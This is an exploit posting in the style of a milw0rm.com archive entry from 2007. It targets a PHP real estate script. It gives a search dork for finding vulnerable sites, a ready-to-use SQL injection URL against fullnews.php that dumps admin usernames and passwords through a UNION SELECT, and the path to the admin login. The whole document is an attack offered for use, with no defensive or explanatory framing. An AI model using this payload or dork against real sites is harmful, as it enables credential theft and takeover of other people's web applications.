31 lines
No EOL
910 B
Text
31 lines
No EOL
910 B
Text
--==+================================================================================+==--
|
|
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: http://phprealestatescript.com
|
|
DORK: "Browse with Interactive Map"
|
|
|
|
|
|
DESCRIPTION:
|
|
pull admin info from database
|
|
|
|
|
|
EXPLOITS:
|
|
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is at /admin/
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-12-14] |